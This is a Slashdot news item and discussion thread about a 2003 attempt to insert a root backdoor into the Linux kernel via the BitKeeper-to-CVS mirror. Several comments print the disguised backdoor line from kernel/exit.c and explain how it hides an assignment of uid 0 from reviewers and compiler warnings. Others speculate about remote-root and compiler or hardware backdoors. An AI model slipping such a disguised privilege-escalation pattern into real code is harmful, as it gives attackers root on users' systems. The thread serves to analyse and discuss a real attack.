Linux Kernel Back-Door Hack Attempt Discovered 687
An anonymous reader writes "The BitKeeper to CVS gateway was apparently hacked in an attempt to add a root exploit back door to the Linux kernel, according to the linux-kernel archive. The change was in the file kernel/exit.c and changed the user ID of a process to root under the guise of checking the validity of some flags. The core Linux BitKeeper kernel repository was not at risk, and in fact it was the BitKeeper CVS export scripts that detected the unauthorized modifications to CVS. The changes were falsely attributed in CVS to long-time Linux developer davem (David Miller). Users of the BKCVS repository should resync their trees to remove the offending code if they had replicated it since yesterday."
Well well (Score:5, Insightful)
Re:Well well (Score:5, Interesting)
You mean like Borland's Interbase? The compiled in backdoor [cert.org] wasn't discovered until after the database opensourced.
My favorite quote from the advisory is:
"This vulnerability was not introduced by unauthorized modifications to the original vendor's source. It was introduced by maintainers of the code within Borland. The back door account password cannot be changed using normal operational commands, nor can the account be deleted from existing vulnerable servers [see References]."
How long was it in there? "These security holes affect all version of InterBase shipped since 1994, on all platforms."
The advisory dates from 2001 -- you do the math.
Re:Well well (Score:4, Insightful)
Re:Well well (Score:3, Insightful)
Re:Well well (Score:2)
Re:Well well (Score:2)
NSA, CIA or MOSSAD?
Re:Well well (Score:5, Informative)
Re:Well well (Score:5, Informative)
All of the vulnerabilities I listed made it into official releases before being patched. The bug this story is about didn't make it one day in the source tree, let alone into an official release.
Sorry about the Protegrity one, I must've linked the wrong one. I was looking for this [cert.org] one (the one exploited by the slammer worm).
You mean, "what's really gonna bake your noodle... (Score:5, Funny)
A friend showed me that once. (Score:2)
Re:Well well (Score:4, Funny)
Well the 12 backdoors I put into the Windows XP kernel haven't been detected yet.
Re:Well well (Score:5, Interesting)
All I'm saying is that I certainly won't be surprised when closed source vendors start using this in their anti-OSS campaigns.
Re:Well well (Score:4, Insightful)
They'd find their customers wanting timely patches and accountability.
Re:Well well (Score:5, Insightful)
And what if we just haven't discovered the code that got through yet...
You've got to ask - assume nothing.
+5, Tin-foil hat.
Re:Well well (Score:4, Insightful)
Re:Well well (Score:3, Insightful)
Re:Well well (Score:4, Insightful)
1. We know that SCO have been looking very closely at the Linux source code.
2. We also know that none of the Linux boxes which serve major anti-SCO websites have been hacked into.
3. We can deduce therefore that SCO have not found any backdoors in the Linux source code.
While given their general level of (in)competence this doesn't amount to proof that there aren't any, it's probably a fairly safe bet.
Re:Well well (Score:3, Insightful)
1) "Boi de piranha":
When you want to make a cattle herd cross a piranha-infested river, you probably will lose many cows (or oxen) -- the trick is get a first ox inside the river for sacrifice; while the piranhas devour it, the rest can pass unharmed.
2) "Porteira que passa um boi, passa uma boiada":
If a gate is wide enough for passing an ox, it's wide enough for an entire herd.
-//-
Have a nice day!
Re:Well well (Score:3, Funny)
Well, in theory.
Of course, you send in the first ox, and the pirannhas attack it. Then you try and get the other oxen to cross, and they are all like "Fuck this man, I ain't going in that freakin' river! Look at what's happenin' to Bob!!!"
Re:Well well (Score:5, Interesting)
This would happen at any closed-source shop that had the same software.
No human eyes discovered the problem, and if someone hadn't installed the checks, it might not have been discovered for months or years or ever.
Comment removed (Score:5, Insightful)
Comment removed (Score:5, Informative)
Re:Well well (Score:5, Insightful)
Have you audited your motherboard BIOS? What about your network card - how do you know it doesn't have an IP stack on the ROM that dials home and dumps your network activity to someone? Hubs? Switches? Routers?
Do you really know what lives in your hard drive controller?
Re:Well well (Score:5, Funny)
Leprechauns live on my hard drive controller, and spin it with all their tiny might.
They're like little green DJs when I use my RAID.
Re:Well well (Score:3)
Ha ha ha. Yep, Cox, Linus and DaveM are without doubt low level hackers. But RMS and ESR? RMS is admittedly somewhere between high and low level, getting down to compilers and linkers, but not down to kernel level. But ESR is strictly a userland programmer.
Re:Well well (Score:4, Funny)
If he isn't a lowest level hacker, my world foundations are crumbling...
Re:Well well (Score:3, Insightful)
No, he's a low level heckler ... "Shut up! It's GNU linux." "Shut up! It's GNU linux." (repeat ad nauseum)
Re:Well well [Thompson: Reflections on Trust] (Score:5, Interesting)
Ken Thompson [bell-labs.com] wrote an original speculative essay [acm.org] on this for CACM [acm.org] back in 1984 of all years.
It is really well worth the read. The short form is that there exists a way to subvert the compiler such that it is no longer trustable and it will build a back door into the OS forevermore. This paper is a must read.
Re:Well well [Thompson: Reflections on Trust] (Score:3, Funny)
For those who didn't read the article by Ken Thompson ( read it here [acm.org]) a compiler is corrupted so that it inserts a bug into all compilers that it compiles, and the purpose of that bug is to insert a bug into another program (such as login) when it compiles it (such as accepting a certain password as the root password)
Both bugs have to be a pattern based search method. They look for some string or some sequence of characters that the original hacker be
Re:Well well (Score:2)
Would it have been detected?
A better question, assuming it was detected, is:
Would the consumers at risk have even been told about the attempt?
Re:Well well (Score:3, Funny)
Has anyone tried sys_wait4(__WCLONE|__WALL) on Unixware?
Re:3 cheers for monolithic kernals (Score:2, Informative)
You honestly have no idea what a "monolithic kernel" is, do you.
Or HIBT.
Re:3 cheers for monolithic kernals (Score:5, Funny)
My God! It's full of stars!
1 x 4 x 9
That monolith... oh... kernel.... right...
Re:3 cheers for monolithic kernals (Score:3, Funny)
(wait - am I supposed to say "here goes my karma" at this point?)
Re:Well well (Score:5, Interesting)
Kinda proves Steve Ballmer's comments about the lack of security in Open Source development, doesn't it?!
No. I just proves you're a posturing idiot. The crack was detected as soon as it was attempted to be inserted, in the experimental development version of the code that hadn't even made it into any final distributions yet.
And here's another example of your idiocy:
If it happened in a software company, the hacker would be fired and probably charged with some kind of "espionage" charge and arrested.
This wasn't an "inside" job. If this happened at a company, to fill the analogy, it would have been an external person, NOT someone they could fire.
Re:Well well (Score:5, Insightful)
And really, it's just more evidence that the Open Source model works. There is really nothing wrong with making a mistake, as long as you learn something from it and share what you learned with other people so they don't have to make the same mistake. Pretending you never make mistakes is another matter entirely
Daaaammmmmnnnn.. (Score:4, Funny)
Let's hope they're cut off.
Re:Daaaammmmmnnnn.. (Score:4, Insightful)
What's the penalty under the law for putting a backdoor in an open-sourced software project?
None.
That's it. That's the list.
Re:Daaaammmmmnnnn.. (Score:5, Insightful)
Seriously, though - there are probably many laws by which it would be illegal. The cracker gained unauthorized access to a system and he vandalized data. And the obvious intent was to create a backdoor in many more systems. If they find this guy, he'll be in serious trouble. The guy he pretended to be could probably also sue him for something.
Re:Daaaammmmmnnnn.. (Score:3, Informative)
Ohhh, I can think of some.
Fraud and destruction/misuse of private property come to mind. And those are pretty much universal...
Re:Daaaammmmmnnnn.. (Score:3, Informative)
Microsoft (Score:3, Funny)
Re:Microsoft (Score:5, Funny)
Re:Microsoft (Score:2)
if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;
I wonder why not a remote root hack (Score:5, Informative)
It's a clever backdoor, and might have gone unnoticed, if not for those those good automated checks in the BitKeeper-to-CVS gateway. Notice that the particular coding style is a common C gotcha (using "=", assignment, instead of "==", comparison). At first glance it looks like the value of uid is being compared with 0, when in actuality it is being assigned the value of 0: root! The gcc compiler is good about warning for this, except that this too has been defeated: as mentioned on the mailing list, notice the unusual high number of parenthesis around this expression. That high number of parenthesis has the effect of suppressing the gcc compiler warning.
So, whoever did this obviously knew what they were doing and tried to obfuscate it. As somebody else mentioned on the kernel mailing list, if somebody is going to put in a backdoor like this, why not make it a remote root hack?
As it is now, the above hack is only locally exploitable. A process on the local system still has to call the wait system call with that particular combination of flags, in order to trigger the exploit and get root. To my knowledge, no known applications do this, because the combination of flags is supposed to be invalid.
If a spammer or somebody else was trying to backdoor the Linux kernel in order to gain a large number of machines to infest, then one wonders why they didn't put in a remote root exploit. It seems strange to go to all the trouble. Since this backdoor attempt has been caught and blocked, security will now only become tighter, and they might not ever get another chance like this.
Maybe it was intended to be used with another application, also backdoored in the same manner? It might be insightful to scan other open source applications and search for this particular usage of flags to the wait system call.
In any case, I'm glad this hack was caught!
Re:I wonder why not a remote root hack (Score:3, Interesting)
Slip in a priveledge escalation bug that's hard to catch. Wait a week or two for it to make its way into the main repository unnoticed, then go back and add a little bit of code to the networking stack or Apache, etc, that allows you to execute arbitrary code as the user running the service.
what is creepy is that the latter may have preceeded the former, and some remote execution exploit has gone unnoticed somewhere.
Re:I wonder why not a remote root hack (Score:3, Informative)
The brackets are necessary to even get the thing to compile as the precedence of '=' is below that of the logical operators.
bash-2.05a$ cat > test.c
int foo() {
extern int x,y,z;
if(x>y && z=0) x=y;
}
bash-2.05a$ gcc test.c
test.c: In function `foo':
test.c:3: invalid lvalue in assignment
YAW.
Re:Microsoft (Score:2)
Why stop there?
And two thumbs too!
Re:Microsoft (Score:2)
Re:Microsoft (Score:3, Interesting)
Re:Microsoft (Score:5, Insightful)
The intent was probably that a CVS user get the bad version, work on other stuff, and send the diff (including the bad lines) to a maintainer in an otherwise good patch. However, the BKCVS gateway got confused by someone other than it changing the CVS, and complained, and Larry McVoy pointed out the issue, someone asked what the lines were, and other people figured out what they'd do. Now, of course, if someone had gotten that bit accidentally and submitted it to a maintainer, they'd notice, so the attempt seems to have failed.
Linus pointed out a benefit to using BK: even if the official BK repository were changed, he doesn't pull from it (because his local copy has all of his changes), and he would get an error the next time he pushed to it. The repository that would have to be attacked is actually his local disk, behind a firewall and not set up for anyone else to access at all.
If RMS wants to rant about revision control systems, he'll need to say that CVS needs to be replaced with a more functional alternative (Subversion, perhaps), not BK.
Re:Microsoft (Score:5, Informative)
It was a subtle change but I think it would have been caught if it had been submitted to Linus. He does review code and often catches mistakes. In this case assignment was used in a condition. To good C programmers this is bad taste. I noticed that right off and I haven't written a line of C in about 6 years. Linus isn't just a good C programmer. After half a decade of watching him catch stuff like this in just his public LKML messages, I'm convinced he would have seen this if he were reading braille hardcopy of it from across the room while drunk.
Re:Microsoft (Score:2)
Now why would SCO backdoor their own code... because all your Linux is belongs to SCO.
Yet another reason to use open source software (Score:3, Insightful)
Re:Yet another reason to use open source software (Score:3, Insightful)
Had this code come in through proper channels, I wouldn't be so sure that it would've been spotted. Most of the source code trojans people have found in the past were not well hidden, and were turned up relatively shortly. The cases I'm referring to are the trojaned configure scripts, that happened to, I believe, irssi and dsniff, o
Re:Yet another reason to use open source software (Score:3, Interesting)
I doubt it, too. For example, in 1998, the CORE SDI put a backdoor into most SSH 1 implementations, which was included in their CRC32 attack decompensator. Of course, they didn't do it on purpose, but it happened nevertheless, and peer review didn't catch it.
Re:Yet another reason to use open source software (Score:3, Informative)
Re:Yet another reason to use open source software (Score:3, Informative)
[emphasis added]
So in fact, it was the power of BitKeeper, or at least BitKeeper's authors, that prevented this, not CVS itself. Looks like closed source saves the day once more...
Re:Yet another reason to use open source software (Score:3, Informative)
No, not really. It's the scripts [iu.edu] written neither by BitKeeper nor by the authors of CVS, but by some developers to allow those unwilling to use BitKeeper to get access to the latest modifications...
!!! rag (Score:3, Funny)
Re:!!! rag (Score:2)
Re:!!! rag (Score:5, Funny)
Re:!!! rag (Score:4, Funny)
hmm (Score:4, Funny)
That McVoy is a smart one!
Did you know his programmers need to feed their families and pay their mortgages? Very sad situation, I hope everybody buys 10-15 licenses ASAP.
more reason to sign patches? (Score:5, Insightful)
That way people who hack in won't be able to send in signed patches to the system [e.g. even if they physicially update the tree others can trivially spot the unsigned patches].
That would of course, require people to actually think about security in terms of "oh sure people won't hack it because it hasn't been done...much...before."
Tom
Re:more reason to sign patches? (Score:4, Insightful)
And if you have access to the key, remember that it's encrypted with a passphrase. Assuming it's 40 letters or longer (Something like "This is a passphrase that is long but easy to remember. I would just like to tell you, Mister Password Prompt, that nobody will guess this!"), you would have to try about 100^40 different passphrases. That's hard.
So basically, it's really hard to forge a digital signature. Harder than breaking into the BK server, anyway.
Re:more reason to sign patches? (Score:3, Insightful)
If a developers machine is compromised (as I imagined in my post) getting the passphrase is trivial. How many different ways can you imagine discovering the keyring passphrase on a machine you have the ability to discretely administer?
Just off the top of my head (and no astronomical exponents required):
Man-in-the-middle the keyring editor
Scarf it from memory
Monitor keystrokes
Harder than breaking into the BK server, anyway.
No one broke in
Re:more reason to sign patches? (Score:3, Insightful)
As much as people like to bash it, it would be useful in the case you described.
NO.
While you are right that Palladium-like-hardware or trusted-whatever-like-hardware could be used as you suggest, there is still absolutely NO justification to forbid the owner of the machine from knowing his own master key. And that is the central design feature of Palladium/NGSCB and TCPA and Trusted-Computing.
There is NO POSSIBLE security be
Re:more reason to sign patches? (Score:3, Insightful)
You're really grasping at straws here, but ok...
Absolutely not. I design and build high-security systems for a living, and these sorts of issues are very, very real. When millions of dollars depend on a key's integrity, this stuff *matters*.
For that matter, if there's a way to compromise keys in bulk, the individual keys don't even have to be very valuable to make the attack worthwhile.
Say the paper-key comes sealed from the chip manufacturer.
Now there are a dozen points during the manufacturing
Curious abot the hack, was it remote? (Score:3, Interesting)
Thanks to the admins and developers that detect that!
Re:Curious abot the hack, was it remote? (Score:5, Insightful)
I'm not so sure about that. Personally I would have put the brackets there even in case of a normal test. They might not be necesarry, but I trust brackets more than I would trust my own ability to remember the precedence of every operator in C.
Alright.... (Score:4, Funny)
You guys get Linus and make sure he brings Tove, since she could probly kick all our asses.
Once thats done we'll Larry McVoy, by this time hopefully he will have the IP of the slimeball.
The Pose rides at Dawn, we can kill some Trolls along the way.
So how do we know that there is only one? (Score:3, Insightful)
What if a backdoor was installed last week, or last month, but was not caught?
The fact that this was possible once, should really make people think about the possibility of it happened ALREADY, and determine if it is necessary to hunt through the code for a systematic review.
Instead, all we get is Microsoft Bashing...
Ugh
Re:So how do we know that there is only one? (Score:2)
At least we're allowed to if we wish...
Re:So how do we know that there is only one? (Score:2)
Yea - because we all know that as soon as this was discovered, all the kernel developers and assorted dabblers decided to spend all their time on Slashdot thinking up MS-bash jokes. Heck. Its amazing that ANY development is being done these days while Slashdot
Re:So how do we know that there is only one? (Score:3, Informative)
We can only ever know about the first two kinds, of course.
Open Source software has had a few of the first kind, and this is one of them. It has had a very, very, very few of the second kind (the classic compiler backdoor is the only one I know of).
Closed source software has had so
yet another reason for (CONSTANT == var) (Score:5, Insightful)
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
In this case, it would make an attempted root hole more visible, as (0 = current->uid) would not compile.
Unfortunately this wasn't an accident. (Score:3, Interesting)
Good style.
But this was apparently not an accident, but a deliberate attempt to disguise a trapdoor. As such the author would, of course, just "forget" to use that piece of defensive programming. B-)
Re:yet another reason for (CONSTANT == var) (Score:3, Insightful)
Please tell me any plausable reason why the mistake is easier to see in the second case than the first:
if (foo = 0) {...}
if (foo = x) {...}
The more eyes... (Score:3, Interesting)
And this is exactly why folks should insist on open source code.
Assuming it was noticed, and I have little reason to think that modification of a project's cvs tree would go unnoticed, a closed source product would have to go up and down the development chain of command. Then likely up and down the marketing chain of command while a decision was made whether to say anything about it (yeah, right) was made. Meetings would be held, blame would be assigned, and - oh yeah - a discussion about a fix would ensue.
Perhaps I exaggerate, but only a little.
I remember when a beta of a game [unnamed software publisher] was working on got ripped off our company ftp site and passed around. There was so much hype about our game that the leaked late beta was a serious disappointment and effectively killed the good buzz the marketing folks had whipped up. [It blew anyway, got shredded by the gaming rags, had a lot of potential but an inexperienced crew and very little financial support.]
Of course, this situation is nothing like that.
There's always going to be someone trying to backdoor the linux kernel, windows, osx, apps galore. Having the source on-hand to look at gives you that added level of confidence that "hey, worst case we can fix it - deal with it ourselves" rather than go through the denial, silence, lame excuse, patch cycle you go through with closed source products.
Ebay-style attacks (Score:3, Interesting)
In other words: 1) Work on the code for a long time, developing good features and build up virtual reputation points so that people trust you. 2) One day decide to insert your backdoor amidst some big checkin. 3) Disappear.
It doesn't seem hard for someone to pay some random third world programmer to do this so. For example, if Red Hat had a guy in russia doing this they could, after the latest kernel was widely distributed, use it to attack Novell/SUSE.
disappear? (Score:2)
Think about how often your own code gets reviewed, debugged, optimised - not necessarily by you, but by Joe Coder on the same project or Wilma Coder some time down the road.
I doubt that someone sociopathic enough to work on something for years under a legitimate guise, then "one day" would be able to keep it
Re:disappear? (Score:2, Flamebait)
Ha ha ha hah. yeah, right, because in the opensource world people _rarely_ are given CVS access, do some work, and then dissapear into the void.
While linux kernel may be more guarded, 98% of projects on sourceforge probably has people with CVS write access that are no longer active in the project. This is a hug
Re:Ebay-style attacks (Score:2)
Re:Ebay-style attacks (Score:2)
Ethics are an interesting thing to bring into this. I'd argue it's more rational (ethical?) for someone who's family is starving/living under life threatening conditions to do a hack job than it is for someone living in a developed country who's doing it for a little more cash.
Re:Ebay-style attacks (Score:2)
Calm down, calm down... (Score:5, Informative)
Trusting Trust (Score:5, Informative)
Reflections on Trusting Trust [wbglinks.net].
You might want to doublecheck that gcc code you're compiling the kernel with...
Re:Trusting Trust (Score:3, Interesting)
Actually, it wouldn't be hard at all. Add logic into the L1 (data) cache which computes the MD5 sum of each cache line loaded; if it is equal to a predetermined value, the address of that line is loaded into the instruction pointer.
Presto, immediate backdoor which can be exploited
As noone else seems to have pointed out yet... (Score:5, Informative)
The "backdoor" that someone attempted to submit was a local privilege elevation bug, not a remote compromise.
doubters are forgetting the foundations of OSS (Score:5, Informative)
this couldn't be further from the truth, you are all forgetting many things, #1 - the checking scripts run daily now, and Larry has mentioned he's going to step that up, still fixed within 24hrs is a damn good response time! closed-source could never be this fast.
#2 - all this talk of peer review, saying it didn't catch this or whatever nonsense, yes in a way it did, and whats more it's exactly what will keep semi-valid attempts or those through "proper channels" out of the code. You forget, millions of people around the world review this stuff, and someone, somewhere will find it relatively quickly, and not just because all the good developers (which is most of the millions) really LIKE linux and do their utmost to protect it, and ensure that no twits do things like this.
on the oft-side billions to one chance someone does something stupid like people said hire someone to do good patches for a long time, get trusted, and submit a patch with this kind of code in it, well, first of all, this is just stupid, it would take years to get that trusted from "zero", second, even assuming all that, the code would still get caught very quickly.
Like I said, someone, somewhere is gonna notice real quick, because the millions of us out in the world really happen to LIKE linux, and protect the kernel most of all, and I'm sure as the code worked its way into the tree, one of the people would catch it, and I'd be willing to bet several would see it at the same moment, including Linus, et all.
You simply can't pull a fast one over the great coders we have, these aren't your average coders, and remember, not just them, but all of us, really, in a way, put our heart and soul into supporting Linux, its a confidence we dont share lightly, the kernel is the most protected of it all, yes, for obvious reasons, its the most critical code.
But even outside the kernel, remember millions of people around the world are reviewing code 24hrs a day, every day, and posting notes about issues, patches, etc.
It's simply much harder to get by all that. Like I said, and I'll say it again, someone's gonna notice, and probably LONG before it even gets into the main BK tree, because even those reviewers ain't slouches!
Closed source has a smaller review team, and I know for a fact internal developers add back-doors to code all the time. I know many closed-source coders (not necessarily personally) that as a matter of habit throw in back-doors into every piece of code they write, because they hate their job, and the people they work for, and hate the product. Since very few people ever review the code, things can sit there indefinately and never get found.
remember this is a work of pride, something the community really cares about, we really want to see it succeed, and not have the issues like this, or that others have, we want to protect it at all costs, in any way, to ensure a good future, and protect the users out there.
remember, we're users too! If it means that much to you, wouldn't you be checking it too? damn straight! This is exactly why the OSS model is so damn important,
and its exactly why Microcrap, SCO, etc will never "get" it. I'd even add Intel to this list, because I think AMD is really "getting" it.
summary - we like it, we care about it, and aint no way we gonna let some dork attempt to ruin something we've worked so damn hard to build, not just for ourselves, but for everyone, its a matter of pride.
and yes, anyone found out (and they will be!) doing this shit is gonna get their ass kicked into next week...
In other news.. (Score:5, Funny)
Must Read: Ken Thompsom's Turing Award Lecture (Score:3, Insightful)
And this, dear reader (Score:5, Insightful)
if(variable == CONSTANT) { }
Or the safe version that's so much harder to screw up and which turns out to be just as easy to read with practice:
if(CONSTANT == variable) { }
Do we all understand the real world significance of this now?
If you still want to advocate (variable == CONSTANT), then please feel free to prove that no accidental or abusive (variable = CONSTANT) exist in the kernel.
Re:Bad News (Score:3, Informative)
Well it got caught didn't it?
It's the quiet ones you've got to watch...
Re:Bad News (Score:5, Insightful)
Yes, everyone who's upset about exploits they haven't heard about, raise their hands...
Re:First of Many? (Score:5, Insightful)
Isn't the pertinent question... was this the first?
Re:My boss is gonna read this.. (Score:3, Funny)
Yeah, because he'd rather like a closed source product where such attempts suceed unnoticed.
Re:No one is mentioning this (Score:5, Insightful)
The code was injected into a CVS tree, the box could have been compromised in another fashion, such as a wu-ftp hole or some such thing.
So please, don't throw the word exploit around as if you have 1/2 a clue about security. It just makes you look silly to those of us who do.
Re:Why on God's earth... (Score:5, Insightful)
Its separate so they can screen CVS commits carefully.